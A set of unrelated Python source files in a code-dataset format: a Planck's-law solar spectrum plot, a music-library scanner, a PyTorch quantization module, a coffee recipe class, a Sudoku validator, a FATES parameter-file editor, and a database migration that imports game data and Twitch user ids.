    # Planck's law: S = e * 2*pi*c^2*h / lambda^5 / (exp(h*c/(lambda*kb*T)) - 1)
    a1=2.*np.pi*c*c*h/(la**5.)
    a2=h*c/(la*kb*t)
    sl=e*a1/(np.exp(a2)-1.)
    sl=sl*10**-6
    st=st+sl*dla #calculate area under the slcurve MW/m^2
    slg=sl*10**-6 #scale to plot
    lag=la*10**6 # wavelength in micrometers for the x-axis
    plt.scatter(lag,slg,s=1,color='r')
# Total output = emittance integral times the sun's surface area.
ds=1.39*10**9 #suns diameter m
spas=np.pi*ds**2. #suns spherical area m2
to=spas*st #suns total output MW
to=to*10**6 # W
# Annotations: temperature label and visible-band boundaries (0.39-0.70 um).
plt.text(.8,58.,'5800')
plt.text(1.05,58, '$^{\circ}$K')
plt.plot([.39,.39],[-0.,100.],'b--')
plt.plot([.7,.7],[-0.,100.],'b--')
plt.text(.3,-10,'.390')
plt.text(.6,-10,'.700')
plt.text(.15,90.,'UV')
plt.text(.8,90.,'long wave infrared')
plt.arrow(1.75,91.,.8,0.,head_width=1.,head_length=.1,color='r')
plt.text(1.2,40.,'total solar output =')
so='%7.3e'% (to)
dd=str(so)
plt.text(2.1,40,dd)
plt.text(2.7,40,'W')
plt.text(1.2,34,'emissivity =')
e=str(e)
plt.text(1.8,34,e)
# Vertical "visible" label spelled one letter per line.
plt.text(.5,75.,'v')
plt.text(.53,70.,'i')
plt.text(.5,65.,'s')
plt.text(.53,60.,'i')
plt.text(.5,55.,'b')
plt.text(.53,50.,'l')
plt.text(.5,45.,'e')
# Narrow sample band at 1.5 um drawn as three adjacent vertical lines.
plt.plot([1.49,1.49],[0.,11.61],color='g')
plt.plot([1.5,1.5],[0.,11.61],color='g')
plt.plot([1.51,1.51],[0.,11.61],color='g')
# Power emitted in the 0.01 um band centered at 1.5 um.
laband=1.5*10**-6
a1=2.*np.pi*c*c*h/(laband**5.)
a2=h*c/(laband*kb*t)
sband=a1/(np.exp(a2)-1.)
sband=sband*10**-12
pband=sband*dla #MW/sq meter
pband=pband*10**6 #W/sq meter
plt.plot([1.55,1.7],[12.5,15.],color='k')
plt.text(1.72,14.,' p=')
pband='%7.3e'%(pband)
pband=str(pband)
plt.text(1.9,14,pband)
plt.text(2.4,14,'MW/m^2')
plt.arrow(1.35,5,.1,0,head_width=1, head_length=.05, ec='k', fc='k')
plt.arrow(1.65,5,-.1,0,head_width=1, head_length=.05, ec='k', fc='k')
plt.text(.82,4.9,'$\Delta \lambda=.01\mu m$' )
plt.show()
6896383846 | import os, os.path
import time, mimetypes
import mutagen
from supysonic import config
from supysonic.db import Folder, Artist, Album, Track
def get_mime(ext):
	"""Map a file extension to a MIME type.

	Tries the standard mimetypes guess first, then a per-extension override
	from the [mimetypes] config section, and finally falls back to the
	generic binary type.
	"""
	guessed = mimetypes.guess_type('dummy.' + ext, False)[0]
	return guessed or config.get('mimetypes', ext) or 'application/octet-stream'
class Scanner:
	"""Synchronises a media folder tree on disk with the Folder / Artist /
	Album / Track database, reading audio metadata through mutagen.

	NOTE(review): this module targets Python 2 (``path.encode('utf8')``
	before os.walk, ``map(...)`` result used as a container) — confirm
	before porting to Python 3.
	"""
	def __init__(self, store):
		# ORM store all queries/inserts go through.
		self.__store = store

		# Added/deleted entity counters, reported by stats().
		self.__added_artists = 0
		self.__added_albums = 0
		self.__added_tracks = 0
		self.__deleted_artists = 0
		self.__deleted_albums = 0
		self.__deleted_tracks = 0

		# Optional whitelist of file extensions from the config
		# ('scanner_extensions', space-separated, matched case-insensitively).
		extensions = config.get('base', 'scanner_extensions')
		self.__extensions = map(str.lower, extensions.split()) if extensions else None

	def scan(self, folder, progress_callback = None):
		"""Walk *folder* recursively and (re)scan every valid media file.

		``progress_callback(current, total)``, if given, is invoked after
		each file. Updates the folder's ``last_scan`` timestamp when done.
		"""
		files = [ os.path.join(root, f) for root, _, fs in os.walk(folder.path.encode('utf8')) for f in fs if self.__is_valid_path(os.path.join(root, f)) ]
		total = len(files)
		current = 0
		for path in files:
			self.__scan_file(path, folder)
			current += 1
			if progress_callback:
				progress_callback(current, total)
		folder.last_scan = int(time.time())
		self.__store.flush()

	def prune(self, folder):
		"""Remove tracks whose files vanished, then the albums, artists and
		sub-folders that became empty as a result."""
		for track in [ t for t in self.__store.find(Track, Track.root_folder_id == folder.id) if not self.__is_valid_path(t.path) ]:
			self.__store.remove(track)
			self.__deleted_tracks += 1
		# TODO execute the conditional part on SQL
		for album in [ a for a in self.__store.find(Album) if a.tracks.count() == 0 ]:
			self.__store.remove(album)
			self.__deleted_albums += 1
		# TODO execute the conditional part on SQL
		for artist in [ a for a in self.__store.find(Artist) if a.albums.count() == 0 ]:
			self.__store.remove(artist)
			self.__deleted_artists += 1
		self.__cleanup_folder(folder)
		self.__store.flush()

	def check_cover_art(self, folder):
		"""Recursively flag folders that contain a 'cover.jpg' file."""
		folder.has_cover_art = os.path.isfile(os.path.join(folder.path, 'cover.jpg'))
		for f in folder.children:
			self.check_cover_art(f)

	def __is_valid_path(self, path):
		"""True when *path* exists and matches the extension whitelist, if any."""
		if not os.path.exists(path):
			return False
		if not self.__extensions:
			return True
		return os.path.splitext(path)[1][1:].lower() in self.__extensions

	def __scan_file(self, path, folder):
		"""Create or refresh the Track row for a single file.

		Unchanged files (by mtime) are skipped; tracks whose tags can no
		longer be read are removed. Tag fields fall back to sensible
		defaults when missing or malformed.
		"""
		tr = self.__store.find(Track, Track.path == path).one()
		add = False
		if tr:
			# Unchanged since the last scan: nothing to do.
			if not int(os.path.getmtime(path)) > tr.last_modification:
				return

			tag = self.__try_load_tag(path)
			if not tag:
				self.__store.remove(tr)
				self.__deleted_tracks += 1
				return
		else:
			tag = self.__try_load_tag(path)
			if not tag:
				return
			tr = Track()
			tr.path = path
			add = True

		# 'disc'/'track' style tags may be "n/total"; keep only n.
		tr.disc = self.__try_read_tag(tag, 'discnumber', 1, lambda x: int(x[0].split('/')[0]))
		tr.number = self.__try_read_tag(tag, 'tracknumber', 1, lambda x: int(x[0].split('/')[0]))
		tr.title = self.__try_read_tag(tag, 'title', '')
		tr.year = self.__try_read_tag(tag, 'date', None, lambda x: int(x[0].split('-')[0]))
		tr.genre = self.__try_read_tag(tag, 'genre')
		tr.duration = int(tag.info.length)
		if not add:
			tr.album = self.__find_album(self.__try_read_tag(tag, 'artist', ''), self.__try_read_tag(tag, 'album', ''))
		# Fall back to size/duration when the container doesn't expose a bitrate.
		tr.bitrate = (tag.info.bitrate if hasattr(tag.info, 'bitrate') else int(os.path.getsize(path) * 8 / tag.info.length)) / 1000
		tr.content_type = get_mime(os.path.splitext(path)[1][1:])
		tr.last_modification = os.path.getmtime(path)

		if add:
			tralbum = self.__find_album(self.__try_read_tag(tag, 'artist', ''), self.__try_read_tag(tag, 'album', ''))
			trfolder = self.__find_folder(path, folder)

			# Set the references at the very last as searching for them will cause the added track to be flushed, even if
			# it is incomplete, causing not null constraints errors.
			tr.album = tralbum
			tr.folder = trfolder
			tr.root_folder = folder
			self.__store.add(tr)
			self.__added_tracks += 1

	def __find_album(self, artist, album):
		"""Return the album named *album* by *artist*, creating it if needed."""
		ar = self.__find_artist(artist)
		al = ar.albums.find(name = album).one()
		if al:
			return al

		al = Album()
		al.name = album
		al.artist = ar

		self.__store.add(al)
		self.__added_albums += 1

		return al

	def __find_artist(self, artist):
		"""Return the artist named *artist*, creating it if needed."""
		ar = self.__store.find(Artist, Artist.name == artist).one()
		if ar:
			return ar

		ar = Artist()
		ar.name = artist

		self.__store.add(ar)
		self.__added_artists += 1

		return ar

	def __find_folder(self, path, folder):
		"""Return the Folder row for the directory containing *path*,
		creating any missing intermediate folders under root *folder*."""
		path = os.path.dirname(path)
		fold = self.__store.find(Folder, Folder.path == path).one()
		if fold:
			return fold

		# Walk the relative path, creating one Folder per missing component.
		full_path = folder.path
		path = path[len(folder.path) + 1:]

		for name in path.split(os.sep):
			full_path = os.path.join(full_path, name)
			fold = self.__store.find(Folder, Folder.path == full_path).one()
			if not fold:
				fold = Folder()
				fold.root = False
				fold.name = name
				fold.path = full_path
				fold.parent = folder

				self.__store.add(fold)

			folder = fold

		return folder

	def __try_load_tag(self, path):
		"""Read the file's tags with mutagen; None when unreadable/untagged."""
		try:
			return mutagen.File(path, easy = True)
		except:
			return None

	def __try_read_tag(self, metadata, field, default = None, transform = lambda x: x[0]):
		"""Read *field* from the tag dict, apply *transform*, and fall back to
		*default* on any missing/empty/malformed value."""
		try:
			value = metadata[field]
			if not value:
				return default
			if transform:
				value = transform(value)
			return value if value else default
		except:
			return default

	def __cleanup_folder(self, folder):
		"""Depth-first removal of folders left without children or tracks
		(the root folder itself is always kept)."""
		for f in folder.children:
			self.__cleanup_folder(f)
		if folder.children.count() == 0 and folder.tracks.count() == 0 and not folder.root:
			self.__store.remove(folder)

	def stats(self):
		"""Return ((added_artists, added_albums, added_tracks),
		(deleted_artists, deleted_albums, deleted_tracks))."""
		return (self.__added_artists, self.__added_albums, self.__added_tracks), (self.__deleted_artists, self.__deleted_albums, self.__deleted_tracks)
| maikelwever/supysonic | supysonic/scanner.py | scanner.py | py | 5,576 | python | en | code | null | github-code | 50 |
42751401954 | import torch
import torch.nn as nn
import numpy as np
from numpy import linalg as LA
class QuantizationF(torch.autograd.Function):
    """Fake-quantization autograd op with a straight-through gradient.

    forward: in linear mode, values are quantized to signed 8-bit levels
    (-127..127) at step ``scale``; in ReLU mode, to unsigned 8-bit levels
    (0..255). ``scale=None`` means pass-through (linear) or a plain ReLU.
    backward: gradients pass straight through, except in ReLU mode where
    positions outside the active range are zeroed.
    """

    @staticmethod
    def forward(ctx, input, islinear, scale):
        ctx.save_for_backward(input)
        ctx.islinear = islinear
        ctx.scale = scale
        if ctx.islinear:
            if ctx.scale is None:
                return input
            return (input / ctx.scale).round().clamp(-127, 127) * ctx.scale
        # ReLU-style path.
        if ctx.scale is None:
            return input.clamp(min=0.0)
        return (input / ctx.scale).round().clamp(0, 255) * ctx.scale

    @staticmethod
    def backward(ctx, grad_output):
        input, = ctx.saved_tensors
        grad_input = grad_output.clone()
        if not ctx.islinear:
            if ctx.scale is None:
                # Plain ReLU: no gradient for non-positive inputs.
                grad_input[input.le(0.0)] = 0
            else:
                # Clipped range: no gradient above saturation or below zero.
                grad_input[input.ge(255 * ctx.scale)] = 0
                grad_input[input.le(0.0)] = 0
        return grad_input, None, None
class Quantization(nn.Module):
    """nn.Module front-end for QuantizationF.

    ``islinear`` selects signed (linear) vs unsigned (ReLU-style)
    quantization; ``scale`` is the quantization step, or None for the
    pass-through / plain-ReLU behavior (e.g. before calibration).
    """
    def __init__(self, islinear, scale=None):
        super(Quantization, self).__init__()
        self.islinear = islinear
        self.scale = scale
    def set_scale(self, scale):
        # Called after calibration to fix the quantization step size.
        self.scale = scale
    def forward(self, x):
        return QuantizationF.apply(x, self.islinear, self.scale)
| peiswang/FFN | models/quan.py | quan.py | py | 1,528 | python | en | code | 2 | github-code | 50 |
37070866974 | ## coffee_creator.py - CoffeeMachine: Create a coffee
# GPLv3 (c) 2020 Laurent Bourgon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
# Libraries
from typing import Dict, Tuple, Set
class Coffee:
    """Basic coffee recipe.

    Args:
        name: Name of the coffee.
        ingredients: Mapping ``{ingredient: amount in mL}``; entries whose
            amount is not an int are silently dropped.
        price: Price of the coffee.
    """

    def __init__(self, name: str, ingredients: Dict[str, int], price: int):
        self.name: str = str(name)
        # Keep only ingredients with an integer amount (bad entries are
        # dropped, preserving the original permissive behaviour).
        self.ingredients: Dict[str, int] = {
            ingredient: int(amount)
            for ingredient, amount in ingredients.items()
            if isinstance(amount, int)
        }
        self.price: int = int(price)

    def __str__(self) -> str:
        return f"{self.name} - {self.price}$:\t{' | '.join([f'{ingredient} - {amount} mL' for ingredient, amount in self.ingredients.items()])}"


class CoffeeCreator(Coffee):
    """:class:`Coffee` subclass with cost and stock calculations.

    Args:
        name: Name of the coffee.
        ingredients: Mapping ``{ingredient: amount in mL}``.
        price: Price of the coffee.
    """

    def __init__(self, name: str, ingredients: Dict[str, int], price: int):
        super().__init__(name, ingredients, price)

    def final_cost(self, number_of_coffees: int) -> int:
        """Return the total price of the number of coffees specified."""
        return self.price * int(number_of_coffees)

    def ingredients_needed(self, number_of_coffees: int) -> Dict[str, int]:
        """Return how much of each ingredient the given number of coffees needs."""
        return {
            ingredient: amount * int(number_of_coffees)
            for ingredient, amount in self.ingredients.items()
        }

    def coffees_possible_cost(self, price: int) -> int:
        """Return the maximum number of coffees you could buy for *price*."""
        return int(price) // self.price

    def coffees_possible_ingredient(self, ingredient: str, amount: int) -> int:
        """Return the maximum number of coffees *amount* of one ingredient allows.

        Raises:
            KeyError: If *ingredient* is not part of this coffee's recipe.
                (Previously an unknown ingredient crashed with an unhelpful
                ``TypeError`` because ``dict.get`` returned ``None``.)
        """
        return int(amount) // self.ingredients[ingredient]

    def limiting_ingredient(
        self, limited_ingredients: Dict[str, int]
    ) -> Tuple[int, Set[str]]:
        """Return the maximum number of coffees that can be made.

        Args:
            limited_ingredients: Mapping ``{ingredient: available amount}``; an
                amount of -1 means "unlimited" and that ingredient is skipped.

        Returns:
            Tuple of (maximum number of coffees, set of limiting ingredients).
        """
        # Work on a copy so the caller's dict is never mutated (the previous
        # implementation wrote default zeros back into the argument).
        available = dict(limited_ingredients)
        # Any recipe ingredient not supplied at all counts as unavailable.
        for ingredient in self.ingredients:
            available.setdefault(ingredient, 0)
        # How many coffees each finite ingredient allows (-1 == unlimited is
        # excluded; extra non-recipe ingredients are ignored).
        amount_of_coffees: Dict[str, int] = {
            ingredient: self.coffees_possible_ingredient(ingredient, amount)
            for ingredient, amount in available.items()
            if ingredient in self.ingredients and amount >= 0
        }
        # Everything was unlimited: kept returning (0, empty) for backward
        # compatibility with the original behaviour.
        if not amount_of_coffees:
            return (0, set())
        # Group ingredients by how many coffees each one allows.
        possible_ingredients: Dict[int, Set[str]] = {}
        for ingredient, count in amount_of_coffees.items():
            possible_ingredients.setdefault(count, set()).add(ingredient)
        max_possible: int = min(possible_ingredients)
        return (max_possible, possible_ingredients[max_possible])
| BourgonLaurent/CoffeeMachine | CoffeeMachine/coffee_creator.py | coffee_creator.py | py | 4,461 | python | en | code | 0 | github-code | 50 |
34655327754 | _author_ = 'jake'
_project_ = 'leetcode'
# https://leetcode.com/problems/valid-sudoku/
# Determine if a Sudoku is valid, according to: Sudoku Puzzles - The Rules.
# The Sudoku board could be partially filled, where empty cells are filled with the character '.'.
# Create a set of digits seen in each row, column and box. False if any duplicates.
# Time - O(n^2) for board of side n
# Space - O(n)
class Solution(object):
    def isValidSudoku(self, board):
        """
        :type board: List[List[str]]
        :rtype: bool

        A board is valid when every filled cell holds a digit 1-9 and no
        digit repeats within its row, its column, or its 3x3 box.
        """
        digits = {str(d) for d in range(1, 10)}
        seen = set()
        for r, row in enumerate(board):
            for c, cell in enumerate(row):
                if cell == '.':
                    continue
                if cell not in digits:
                    return False
                # One key per constraint group: row, column and 3x3 box.
                keys = (('row', r, cell),
                        ('col', c, cell),
                        ('box', r // 3, c // 3, cell))
                if any(key in seen for key in keys):
                    return False
                seen.update(keys)
        return True
70618463514 | #!/usr/bin/env python
#### this script modifies a FATES parameter file. It accepts the following flags
# --var or --variable: variable.
# --pft or --PFT: PFT number. If this is missing, script will assume that its a global variable that is being modified.
# --input or --fin: input filename.
# --output or --fout: output filename. If missing, will assume its directly modifying the input file, and will prompt unless -O is specified
# --O or --overwrite: overwrite output file without asking.
# --value or --val: value to put in variable
# --s or --silent: don't write anything on successful execution.
####
#
# Written by C. Koven, 2018
#
# =======================================================================================
# =======================================================================================
import os
from scipy.io import netcdf as nc
import argparse
import shutil
import tempfile
import sys
import datetime
import time
# ========================================================================================
# ========================================================================================
# Main
# ========================================================================================
# ========================================================================================
def main():
    """Parse command-line arguments and apply one value change to a FATES
    netCDF parameter file.

    The edit is made on a temporary copy first, so the original file is left
    untouched if anything fails.  Unless ``--nohist`` is given the edit is
    also recorded in the output file's ``history`` attribute.
    """
    parser = argparse.ArgumentParser(description='Parse command line arguments to this script.')
    #
    parser.add_argument('--var','--variable', dest='varname', type=str, help="What variable to modify? Required.", required=True)
    parser.add_argument('--pft','--PFT', dest='pftnum', type=int, help="PFT number to modify. If this is missing and --allPFTs is not specified, will assume a global variable.")
    parser.add_argument('--allPFTs', '--allpfts', dest='allpfts', help="apply to all PFT indices. Cannot use at same time as --pft argument.", action="store_true")
    parser.add_argument('--fin', '--input', dest='inputfname', type=str, help="Input filename. Required.", required=True)
    parser.add_argument('--fout','--output', dest='outputfname', type=str, help="Output filename. Required.", required=True)
    parser.add_argument('--val', '--value', dest='val', type=float, help="New value of PFT variable. Required.", required=True)
    parser.add_argument('--O','--overwrite', dest='overwrite', help="If present, automatically overwrite the output file.", action="store_true")
    parser.add_argument('--silent', '--s', dest='silent', help="prevent writing of output.", action="store_true")
    parser.add_argument('--nohist', dest='nohist', help="prevent recording of the edit in the history attribute of the output file", action="store_true")
    #
    args = parser.parse_args()
    #
    # work with the file in some random temporary place so that if something goes wrong, then nothing happens to original file and it doesn't make a persistent output file
    tempdir = tempfile.mkdtemp()
    tempfilename = os.path.join(tempdir, 'temp_fates_param_file.nc')
    #
    try:
        shutil.copyfile(args.inputfname, tempfilename)
        #
        # open the copy in append mode so the variable can be edited in place
        ncfile = nc.netcdf_file(tempfilename, 'a')
        #
        var = ncfile.variables[args.varname]
        #
        ### check to make sure that, if a PFT is specified, the variable has a PFT dimension, and if not, then it doesn't. and also that shape is reasonable.
        ndim_file = len(var.dimensions)
        ispftvar = False
        # for purposes of current state of this script, assume 1D
        if ndim_file > 1:
            raise ValueError('variable dimensionality is too high for this script')
        if ndim_file < 1:
            raise ValueError('variable dimensionality is too low for this script. FATES assumes even scalars have a 1-length dimension')
        for i in range(ndim_file):
            if var.dimensions[i] == 'fates_pft':
                ispftvar = True
                npft_file = var.shape[i]
                pftdim = 0
            elif var.dimensions[i] == 'fates_scalar':
                npft_file = None
                pftdim = None
            else:
                raise ValueError('variable is not on either the PFT or scalar dimension')
        # validate the PFT / allPFTs flags against the variable's dimension
        if (args.pftnum == None and ispftvar) and not args.allpfts:
            raise ValueError('pft value is missing but variable has pft dimension.')
        if (args.pftnum != None) and args.allpfts:
            raise ValueError("can't specify both a PFT number and the argument allPFTs.")
        if args.pftnum != None and not ispftvar:
            raise ValueError('pft value is present but variable does not have pft dimension.')
        if args.pftnum != None and ispftvar:
            # NOTE: --pft is 1-based on the command line; stored 0-based below.
            if args.pftnum > npft_file:
                raise ValueError('PFT specified ('+str(args.pftnum)+') is larger than the number of PFTs in the file ('+str(npft_file)+').')
            if pftdim == 0:
                if not args.silent:
                    print('replacing prior value of variable '+args.varname+', for PFT '+str(args.pftnum)+', which was '+str(var[args.pftnum-1])+', with new value of '+str(args.val))
                var[args.pftnum-1] = args.val
        elif args.allpfts and ispftvar:
            if pftdim == 0:
                if not args.silent:
                    print('replacing prior values of variable '+args.varname+', for all PFTs, which were '+str(var[:])+', with new value of '+str(args.val))
                var[:] = args.val
        elif args.pftnum == None and not ispftvar:
            if not args.silent:
                print('replacing prior value of variable '+args.varname+', which was '+str(var[:])+', with new value of '+str(args.val))
            var[:] = args.val
        else:
            raise ValueError('Nothing happened somehow.')
        #
        if not args.nohist:
            # write to the netcdf file history attribute what you just did.
            actionstring = 'modify_fates_paramfile.py '+' '.join(sys.argv[1:])
            timestampstring = datetime.datetime.fromtimestamp(time.time()).strftime('%a %b %d %Y, %H:%M:%S')
            #
            oldhiststr = ncfile.history
            newhiststr = oldhiststr + "\n "+timestampstring + ': ' + actionstring
            ncfile.history = newhiststr
        #
        ncfile.close()
        #
        #
        # now move file from temporary location to final location
        #
        # check to see if output file exists
        if os.path.isfile(args.outputfname):
            if args.overwrite:
                if not args.silent:
                    print('replacing file: '+args.outputfname)
                os.remove(args.outputfname)
            else:
                raise ValueError('Output file already exists and overwrite flag not specified for filename: '+args.outputfname)
        #
        shutil.move(tempfilename, args.outputfname)
        shutil.rmtree(tempdir, ignore_errors=True)
    except:
        # bare except is deliberate here: clean up the temp dir on ANY
        # failure, then re-raise whatever happened unchanged.
        shutil.rmtree(tempdir, ignore_errors=True)
        raise
# =======================================================================================
# This is the actual call to main
if __name__ == "__main__":
    main()
| NGEET/fates-release | tools/modify_fates_paramfile.py | modify_fates_paramfile.py | py | 7,190 | python | en | code | 11 | github-code | 50 |
19769448823 | revision = 'affc03cb46f5'
down_revision = '988883a6be1d'
branch_labels = None
depends_on = None
import alembic
import sqlalchemy
import json
import itertools
import requests
import logging
import urllib.parse
log = logging.getLogger("affc03cb46f5_game_data")
def upgrade():
    """Create the games/shows/stats schema and migrate legacy JSON data into it.

    Builds the new tables (shows, games, game_per_show_data, stats,
    game_stats, game_votes, disabled_stats), imports the corresponding
    sections of the bot's JSON datafile, resolves vote nicknames to Twitch
    user ids via the Twitch API, rewires the quotes table onto the new
    foreign keys, and finally strips the migrated sections from the JSON file.
    """
    conn = alembic.context.get_context().bind
    meta = sqlalchemy.MetaData(bind=conn)
    meta.reflect()
    users = meta.tables["users"]
    all_users = dict(conn.execute(sqlalchemy.select(users.c.name, users.c.id)).fetchall())
    shows = alembic.op.create_table(
        "shows",
        sqlalchemy.Column("id", sqlalchemy.Integer, primary_key=True),
        sqlalchemy.Column("string_id", sqlalchemy.Text, nullable=False, unique=True),
        sqlalchemy.Column("name", sqlalchemy.Text, nullable=False),
    )
    # Negative-counting sequence: manually-added games get ids -1, -2, ... so
    # they can never collide with (positive) externally-assigned game ids.
    alembic.op.execute(sqlalchemy.schema.CreateSequence(sqlalchemy.Sequence("games_id_seq", start=-1, increment=-1)))
    # NOTE(review): the Python-side Sequence is named "game_id_seq" while the
    # created sequence/server default use "games_id_seq" — confirm intentional.
    games = alembic.op.create_table(
        "games",
        sqlalchemy.Column("id", sqlalchemy.Integer, sqlalchemy.Sequence("game_id_seq"), primary_key=True, server_default=sqlalchemy.func.nextval('games_id_seq')),
        sqlalchemy.Column("name", sqlalchemy.Text, unique=True, nullable=False),
    )
    alembic.op.execute("ALTER SEQUENCE games_id_seq OWNED BY games.id")
    game_per_show_data = alembic.op.create_table(
        "game_per_show_data",
        sqlalchemy.Column("game_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("games.id", ondelete="CASCADE", onupdate="CASCADE"), nullable=False),
        sqlalchemy.Column("show_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("shows.id", ondelete="CASCADE", onupdate="CASCADE"), nullable=False),
        sqlalchemy.Column("display_name", sqlalchemy.Text),
        sqlalchemy.Column("verified", sqlalchemy.Boolean),
    )
    alembic.op.create_primary_key("game_per_show_data_pk", "game_per_show_data", ["game_id", "show_id"])
    stats = alembic.op.create_table(
        "stats",
        sqlalchemy.Column("id", sqlalchemy.Integer, primary_key=True),
        sqlalchemy.Column("string_id", sqlalchemy.Text, nullable=False, unique=True),
        sqlalchemy.Column("singular", sqlalchemy.Text),
        sqlalchemy.Column("plural", sqlalchemy.Text),
        sqlalchemy.Column("emote", sqlalchemy.Text),
    )
    # NOTE(review): stat_id's ForeignKey below points at "shows.id"; it
    # presumably should reference "stats.id" — verify before relying on it.
    game_stats = alembic.op.create_table(
        "game_stats",
        sqlalchemy.Column("game_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("games.id", ondelete="CASCADE", onupdate="CASCADE"), nullable=False),
        sqlalchemy.Column("show_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("shows.id", ondelete="CASCADE", onupdate="CASCADE"), nullable=False),
        sqlalchemy.Column("stat_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("shows.id", ondelete="CASCADE", onupdate="CASCADE"), nullable=False),
        sqlalchemy.Column("count", sqlalchemy.Integer, nullable=False),
    )
    alembic.op.create_primary_key("game_stats_pk", "game_stats", ["game_id", "show_id", "stat_id"])
    game_votes = alembic.op.create_table(
        "game_votes",
        sqlalchemy.Column("game_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("games.id", ondelete="CASCADE", onupdate="CASCADE"), nullable=False),
        sqlalchemy.Column("show_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("shows.id", ondelete="CASCADE", onupdate="CASCADE"), nullable=False),
        sqlalchemy.Column("user_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("users.id", ondelete="CASCADE", onupdate="CASCADE"), nullable=False),
        sqlalchemy.Column("vote", sqlalchemy.Boolean, nullable=False),
    )
    alembic.op.create_primary_key("game_votes_pk", "game_votes", ["game_id", "show_id", "user_id"])
    disabled_stats = alembic.op.create_table(
        "disabled_stats",
        sqlalchemy.Column("show_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("shows.id", ondelete="CASCADE", onupdate="CASCADE"), nullable=False),
        sqlalchemy.Column("stat_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("stats.id", ondelete="CASCADE", onupdate="CASCADE"), nullable=False),
    )
    alembic.op.create_primary_key("disabled_stats_pk", "disabled_stats", ["show_id", "stat_id"])
    # Move data
    datafile = alembic.context.config.get_section_option("lrrbot", "datafile", "data.json")
    clientid = alembic.context.config.get_section_option("lrrbot", "twitch_clientid")
    clientsecret = alembic.context.config.get_section_option("lrrbot", "twitch_clientsecret")
    with open(datafile) as f:
        data = json.load(f)
    # stats
    alembic.op.bulk_insert(stats, [{
        "string_id": string_id,
        "emote": values.get("emote"),
        "plural": values.get("plural"),
        "singular": values.get("singular"),
    } for string_id, values in data.get("stats", {}).items()])
    all_stats = dict(conn.execute(sqlalchemy.select(stats.c.string_id, stats.c.id)).fetchall())
    # shows
    alembic.op.bulk_insert(shows, [{
        "string_id": show,
        "name": values["name"],
    } for show, values in data.get("shows", {}).items()])
    all_shows = dict(conn.execute(sqlalchemy.select(shows.c.string_id, shows.c.id)).fetchall())
    # games
    # Legacy ids are stored as strings; non-numeric ids map to None.
    def parse_id(id):
        if id is None:
            return None
        try:
            return int(id)
        except ValueError:
            return None
    for show in data.get("shows", {}).values():
        for game_id, game in show.get("games", {}).items():
            game_id = parse_id(game_id) or parse_id(game.get("id"))
            if game_id is None:
                conn.execute("INSERT INTO games (name) VALUES (%(name)s) ON CONFLICT (name) DO NOTHING", {"name": game["name"]})
            else:
                conn.execute("""
                    INSERT INTO games (
                        id,
                        name
                    ) VALUES (
                        %(id)s,
                        %(name)s
                    ) ON CONFLICT (name) DO UPDATE SET
                        id = EXCLUDED.id
                """, {"id": game_id, "name": game["name"]})
    all_games = dict(conn.execute(sqlalchemy.select(games.c.name, games.c.id)).fetchall())
    # game_per_show_data
    display_names = []
    for show_id, show in data.get("shows", {}).items():
        for game in show.get("games", {}).values():
            if "display" in game:
                display_names.append({
                    "show_id": all_shows[show_id],
                    "game_id": parse_id(game.get("id")) or all_games[game["name"]],
                    "display_name": game["display"],
                })
    alembic.op.bulk_insert(game_per_show_data, display_names)
    # game_stats
    all_game_stats = []
    for show_id, show in data.get("shows", {}).items():
        for game in show.get("games", {}).values():
            game_id = parse_id(game.get("id")) or all_games[game["name"]]
            for stat, count in game.get("stats", {}).items():
                all_game_stats.append({
                    "show_id": all_shows[show_id],
                    "game_id": game_id,
                    "stat_id": all_stats[stat],
                    "count": count,
                })
    alembic.op.bulk_insert(game_stats, all_game_stats)
    # game_votes
    # Votes are keyed by nickname in the JSON; unknown nicknames are resolved
    # to Twitch user ids over the network (failures are logged and skipped).
    all_votes = []
    with requests.Session() as session:
        req = session.post('https://id.twitch.tv/oauth/token', params={
            'client_id': clientid,
            'client_secret': clientsecret,
            'grant_type': 'client_credentials',
        })
        req.raise_for_status()
        token = req.json()['access_token']
        for show_id, show in data.get("shows", {}).items():
            for game in show.get("games", {}).values():
                game_id = parse_id(game.get("id")) or all_games[game["name"]]
                for nick, vote in game.get("votes", {}).items():
                    if nick not in all_users:
                        try:
                            req = session.get(
                                "https://api.twitch.tv/helix/users?login=%s" % urllib.parse.quote(nick),
                                headers={'Client-ID': clientid, 'Authorization': f'Bearer {token}'})
                            req.raise_for_status()
                            user = req.json()['data'][0]
                            all_users[nick] = user["id"]
                            alembic.op.bulk_insert(users, [{
                                "id": user["id"],
                                "name": user["login"],
                                "display_name": user.get("display_name"),
                            }])
                        except Exception:
                            log.exception("Failed to fetch data for %r", nick)
                            all_users[nick] = None
                    if all_users[nick] is None:
                        continue
                    all_votes.append({
                        "show_id": all_shows[show_id],
                        "game_id": game_id,
                        "user_id": all_users[nick],
                        "vote": vote,
                    })
    alembic.op.bulk_insert(game_votes, all_votes)
    # disabled_stats
    if "swiftlycam" in all_shows:
        for_cameron = []
        if "death" in all_stats:
            for_cameron.append({
                "show_id": all_shows["swiftlycam"],
                "stat_id": all_stats["death"]
            })
        if "tilt" in all_stats:
            for_cameron.append({
                "show_id": all_shows["swiftlycam"],
                "stat_id": all_stats["tilt"]
            })
        if "pave" in all_stats:
            for_cameron.append({
                "show_id": all_shows["swiftlycam"],
                "stat_id": all_stats["pave"],
            })
        alembic.op.bulk_insert(disabled_stats, for_cameron)
    # Rewire quotes from free-text game/show columns to foreign keys.
    alembic.op.add_column("quotes", sqlalchemy.Column("game_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("games.id", ondelete="CASCADE", onupdate="CASCADE")))
